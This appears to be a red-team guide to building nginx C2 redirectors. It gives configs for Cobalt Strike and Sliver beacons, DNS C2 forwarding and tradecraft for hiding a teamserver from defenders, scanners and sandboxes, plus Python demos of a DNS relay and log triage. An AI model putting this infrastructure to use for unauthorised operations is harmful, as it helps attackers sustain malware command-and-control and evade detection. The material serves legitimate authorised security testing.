2026-05-08 18:07:45 -05:00

C2 Redirectors (nginx)

Purpose

Redirectors are disposable hosts that sit between the implants and the C2 server: implants only ever talk to the redirector, which forwards beacon traffic to the real C2 and sends everything else to a decoy site. When defenders block or report the infrastructure they burn the redirector's IP and domain, not the C2. Lock the C2 server down so it accepts connections only from the redirector's IP (host firewall or cloud security group); the redirector is the only thing that should be able to reach it.

Setup (nginx on Debian/Ubuntu)

# Install nginx and certbot with its nginx plugin (certbot --nginx needs it)
apt install nginx certbot python3-certbot-nginx

# For HTTPS redirectors, get a cert. The domain must already resolve to this
# host and port 80 must be reachable from the internet for the HTTP-01 challenge.
# Use "certbot certonly --nginx" if you want the cert files without certbot
# rewriting your server blocks.
certbot --nginx -d redirector.example.com

HTTP/HTTPS Redirector Config

server {
    listen 80;
    server_name redirector.example.com;

    # Plain HTTP is bounced to the decoy site; implants beacon over 443 only.
    location / {
        return 301 https://legitimate-site.com$request_uri;
    }
}

server {
    listen 443 ssl;
    server_name redirector.example.com;

    ssl_certificate /etc/letsencrypt/live/redirector.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/redirector.example.com/privkey.pem;

    # Catch-all: anything that is not beacon traffic is proxied to the decoy site.
    # Without a location / nginx serves its own document root (the stock welcome
    # page on a fresh Debian install), which fingerprints the host immediately.
    location / {
        proxy_pass https://legitimate-site.com;
        proxy_set_header Host legitimate-site.com;
        proxy_ssl_server_name on;   # send SNI upstream or the decoy's TLS handshake may fail
    }

    # C2 traffic goes to the actual C2. Exact match (=): a plain prefix location
    # would also send /jquery-3.6.0.min.js.map or /jquery-3.6.0.min.jsx to the C2.
    location = /jquery-3.6.0.min.js {
        proxy_pass http://10.0.0.5:8080;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;   # implant IP for C2 logs
    }
}
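Before deploying a config like the one above it is worth checking which backend each URI actually lands on, because nginx's location selection (exact match first, then longest prefix, then regexes in config order, then the prefix again) is where redirectors leak. The following is an added example, not code from the page: a small Python model of that selection algorithm, run against the page's 443 server block as written (plain prefix for the C2 path, no catch-all) and against a hardened variant (catch-all to the decoy, exact match for the C2 path, plus a hypothetical regex for a second family of beacon URIs). The backend labels are demo names, and the model skips nginx's URI normalisation (percent-decoding, collapsing //, resolving ..), so give it normalised paths.

```python
"""Model of nginx location selection for checking redirector routing (added example).
Implements the documented algorithm for =, plain prefix, ^~ and ~ / ~* locations;
does not normalise URIs the way nginx does, so pass already-normalised paths."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Location:
    modifier: str   # "=", "^~", "~", "~*" or "" for a plain prefix
    pattern: str    # literal path/prefix, or a regex for ~ and ~*
    backend: str    # demo label for where the request is sent


def select_location(locations, uri):
    """Return the Location nginx would pick for uri, or None if nothing matches."""
    # 1. An exact match ends the search immediately.
    for loc in locations:
        if loc.modifier == "=" and loc.pattern == uri:
            return loc
    # 2. Remember the longest matching prefix (plain or ^~).
    best = None
    for loc in locations:
        if loc.modifier in ("", "^~") and uri.startswith(loc.pattern):
            if best is None or len(loc.pattern) > len(best.pattern):
                best = loc
    # 3. ^~ on the longest prefix suppresses the regex pass.
    if best is not None and best.modifier == "^~":
        return best
    # 4. Otherwise the first regex in config order that matches wins ...
    for loc in locations:
        if loc.modifier in ("~", "~*"):
            flags = re.IGNORECASE if loc.modifier == "~*" else 0
            if re.search(loc.pattern, uri, flags):
                return loc
    # 5. ... and only then does the longest prefix apply.
    return best


def route(locations, uri):
    """Backend label for uri; 'nginx-default' when no location matches and nginx
    falls back to serving its own document root (the stock welcome page)."""
    loc = select_location(locations, uri)
    return loc.backend if loc else "nginx-default"


# The page's 443 server block as written: plain prefix for the C2 path, no catch-all.
PAGE_CONFIG = [
    Location("", "/static", "decoy"),
    Location("", "/jquery-3.6.0.min.js", "c2"),
]

# Hardened variant: catch-all to the decoy, exact match for the C2 path, and a
# regex for a second, hypothetical family of beacon URIs under /api/.
HARDENED_CONFIG = [
    Location("", "/", "decoy"),
    Location("=", "/jquery-3.6.0.min.js", "c2"),
    Location("~", r"^/api/v\d+/[a-z]+\.json$", "c2"),
]


if __name__ == "__main__":
    for uri in ("/", "/jquery-3.6.0.min.js", "/jquery-3.6.0.min.js.map",
                "/api/v2/status.json", "/static/app.css"):
        print(f"{uri:28} page={route(PAGE_CONFIG, uri):14} hardened={route(HARDENED_CONFIG, uri)}")
```

Running it shows the two problems with the original block: `/jquery-3.6.0.min.js.map` reaches the C2 under the prefix location but the decoy under the exact one, and `/` hits nginx's default root in the original because nothing matches it.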

Cobalt Strike Redirector

# Route on the URIs from the Malleable C2 profile (http-get / http-post "uri");
# one exact-match location per URI, or a regex that covers the whole set
location = /jquery-3.6.0.min.js {
    proxy_pass http://c2-server:80;
    # Host header the listener/profile expects, not the redirector's own name
    proxy_set_header Host staging.hoolulu.com;
    # Implant source IP for teamserver logs; the profile must set
    # http-config { trust_x_forwarded_for "true"; } for it to be used
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}

Sliver Redirector

Sliver's HTTP(S) C2 URIs are not fixed: the server generates them from the path segments and filenames in its http-c2.json profile, so a single location will not catch every beacon request. Match the prefixes or extensions your profile produces (the /api/ prefix below is only an example) and keep a catch-all location / that proxies everything else to the decoy.

# A Sliver https listener speaks TLS: proxy_pass must be https://, not http://
# (its default cert is self-signed; nginx skips upstream cert checks unless
# proxy_ssl_verify is turned on, so nothing extra is needed)
location ^~ /api/ {
    proxy_pass https://sliver-server:443;
    proxy_ssl_server_name on;
    proxy_set_header Host $host;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
# Or start a plain http listener on the Sliver server and keep proxy_pass http://;
# TLS already terminates on the redirector.

DNS Redirector (for DNS C2)

DNS C2 is not an A record. You delegate a zone to the redirector and the redirector forwards every query for that zone to the C2's DNS listener. At the registrar (or in the parent zone) add an NS record for the C2 zone, e.g. c2.example.com (placeholder), pointing at a hostname whose A record is the redirector's IP. Then on the redirector:

# Ubuntu: systemd-resolved holds port 53 by default; stop it (and point
# /etc/resolv.conf at an external resolver) or dnsmasq will not bind.
# Forward the delegated zone to the C2's DNS listener (10.0.0.5 from the HTTP
# config above; append #port if the listener is not on 53) and never cache:
# DNS C2 encodes data in unique subdomains, and cached answers break it.
cat > /etc/dnsmasq.d/c2.conf <<'EOF'
server=/c2.example.com/10.0.0.5
cache-size=0
EOF
systemctl restart dnsmasq

If you would rather not run a resolver on the box, DNAT UDP and TCP port 53 straight to the C2 with iptables instead.
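What the dnsmasq forward (or a DNAT rule) does at the packet level is simple: take each datagram from the implant, hand it to the C2's DNS listener, hand the answer back. The following is an added example, not part of the page, dnsmasq or any C2 framework: a minimal UDP DNS redirector in Python with a stub C2 DNS listener and a client, all on loopback, so the round trip can be run offline. The zone c2.example.com, the label a1b2 and the TXT payload "tasking:ok" are placeholders constructed for the demo; a real redirector would bind port 53 and point the upstream at the C2 server.

```python
"""Minimal UDP DNS redirector with a stub C2 listener, run end to end on loopback
(added example; zone, label and payload are constructed for the demo)."""
import socket
import struct
import threading

TXT = 16  # QTYPE for TXT records, a common downstream channel for DNS C2


def build_query(txid, name, qtype=TXT):
    """Standard DNS query: 12-byte header, QNAME labels, QTYPE, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def build_txt_reply(query, text):
    """What a C2 DNS listener sends back: same txid, question echoed, one TXT RR.
    TTL is 0 so nothing on the path is allowed to cache it."""
    txid, = struct.unpack("!H", query[:2])
    question = query[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA; one answer
    rdata = bytes([len(text)]) + text.encode()
    rr = b"\xc0\x0c" + struct.pack("!HHIH", TXT, 1, 0, len(rdata)) + rdata  # name ptr -> offset 12
    return header + question + rr


def parse_txt_reply(reply):
    """Return (txid, txt) from a single-answer TXT reply built as above."""
    txid, = struct.unpack("!H", reply[:2])
    i = 12
    while reply[i] != 0:                 # walk the QNAME labels
        i += reply[i] + 1
    i += 1 + 4                           # root label, QTYPE, QCLASS
    rdlen, = struct.unpack("!H", reply[i + 10:i + 12])   # after name ptr(2) type(2) class(2) ttl(4)
    rdata = reply[i + 12:i + 12 + rdlen]
    return txid, rdata[1:1 + rdata[0]].decode()


def relay_one(listen_sock, upstream):
    """The redirector: move one datagram to the C2 and its reply back, byte for byte.
    It never parses the packet, so txid, question and answer pass through intact."""
    data, client = listen_sock.recvfrom(4096)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as up:
        up.settimeout(5)
        up.sendto(data, upstream)
        reply, _ = up.recvfrom(4096)
    listen_sock.sendto(reply, client)


def serve_c2_once(sock, text):
    """Stand-in for the C2 server's DNS listener: answers one query with a TXT record."""
    query, peer = sock.recvfrom(4096)
    sock.sendto(build_txt_reply(query, text), peer)


def _udp_socket():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(5)
    s.bind(("127.0.0.1", 0))             # ephemeral port; a real redirector binds :53
    return s


def demo(txid=0x1234, name="a1b2.c2.example.com", payload="tasking:ok"):
    """Client -> redirector -> C2 and back on loopback; returns what the client saw."""
    c2, redir, client = _udp_socket(), _udp_socket(), _udp_socket()
    threads = [threading.Thread(target=serve_c2_once, args=(c2, payload)),
               threading.Thread(target=relay_one, args=(redir, c2.getsockname()))]
    for t in threads:
        t.start()
    query = build_query(txid, name)
    client.sendto(query, redir.getsockname())
    reply, _ = client.recvfrom(4096)
    for t in threads:
        t.join()
    for s in (c2, redir, client):
        s.close()
    got_txid, txt = parse_txt_reply(reply)
    return {"txid": got_txid, "txt": txt, "question_intact": reply[12:len(query)] == query[12:]}


if __name__ == "__main__":
    print(demo())
```

The point of the demo is the relay function: the redirector carries no zone data and makes no decisions, which is why a forwarder (dnsmasq with caching off, or a DNAT rule) is all the redirector needs, and why the NS delegation and the zone itself live on the C2 side.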

Operational Notes

  • Front the redirector with a CDN (Cloudflare, Akamai) when the engagement allows it; several large CDNs have blocked domain fronting, so treat the CDN as reputation cover for the domain rather than as a way to hide the backend
  • One redirector (and one domain) per operation, so that a burned redirector takes down only that operation
  • Keep full nginx access logs on the redirector, and pass the implant's source IP to the C2 via X-Forwarded-For, so you can deconflict with the client's defenders and trace which scanners or sandboxes touched the C2 paths
  • Test every path from outside the environment before the engagement: the C2 URI reaches the C2, every other URI reaches the decoy, plain HTTP redirects, and the certificate is valid
  • Only forward requests that look like your implant (expected URI, method, User-Agent) to the C2; send everything else to the decoy so scanners and sandboxes never see the teamserver
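The logs are only useful if they get read. The following is an added example, not from the page: a triage script for the redirector's nginx access log (default combined format) that separates real beacon check-ins from probes that hit the C2 URI with a different User-Agent (scanners, sandboxes, analysts following a link) and from ordinary decoy traffic, per source IP. The C2 path is the page's example URI; the implant User-Agent is an assumed value standing in for whatever the implant profile actually sends; the log lines are constructed, not captured.

```python
"""Triage of a redirector's nginx access log: beacon vs probe vs decoy per source IP
(added example; C2 path and implant UA are assumptions, log lines are constructed)."""
import re
from collections import Counter, defaultdict

# nginx's default 'combined' log_format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>[^ ?"]+)\S* \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

C2_PATHS = {"/jquery-3.6.0.min.js"}            # URIs the redirector routes to the C2
IMPLANT_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36")   # assumed implant UA


def classify(entry):
    """beacon: C2 path with the implant's UA; probe: C2 path with any other UA; decoy: the rest."""
    if entry["path"] in C2_PATHS:
        return "beacon" if entry["ua"] == IMPLANT_UA else "probe"
    return "decoy"


def triage(lines):
    """Return ({class: Counter(ip -> hits)}, [(ip, ua) for probes worth reviewing])."""
    summary = defaultdict(Counter)
    probes = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            summary["unparsed"]["-"] += 1   # anything that is not a combined-format line
            continue
        e = m.groupdict()
        cls = classify(e)
        summary[cls][e["ip"]] += 1
        if cls == "probe":
            probes.append((e["ip"], e["ua"]))
    return dict(summary), probes


# Constructed sample: two beacon check-ins, one decoy visit, a curl hit on the C2
# path followed by a scanner request, and a line nginx never wrote.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/May/2026:18:01:02 -0500] "GET /jquery-3.6.0.min.js HTTP/1.1" 200 1312 "-" "' + IMPLANT_UA + '"',
    '203.0.113.7 - - [08/May/2026:18:02:03 -0500] "POST /jquery-3.6.0.min.js?id=1 HTTP/1.1" 200 0 "-" "' + IMPLANT_UA + '"',
    '198.51.100.9 - - [08/May/2026:18:02:10 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [08/May/2026:18:03:55 -0500] "GET /jquery-3.6.0.min.js HTTP/1.1" 200 1312 "-" "curl/8.5.0"',
    '192.0.2.44 - - [08/May/2026:18:03:56 -0500] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"',
    'garbage line that nginx never wrote',
]


if __name__ == "__main__":
    summary, probes = triage(SAMPLE_LOG)
    for cls, ips in summary.items():
        print(cls, dict(ips))
    print("review:", probes)
```

A probe entry means a request reached the C2 path without looking like the implant; with a User-Agent check in the C2 location those requests go to the decoy instead, and this report is how you confirm the filter is doing its job.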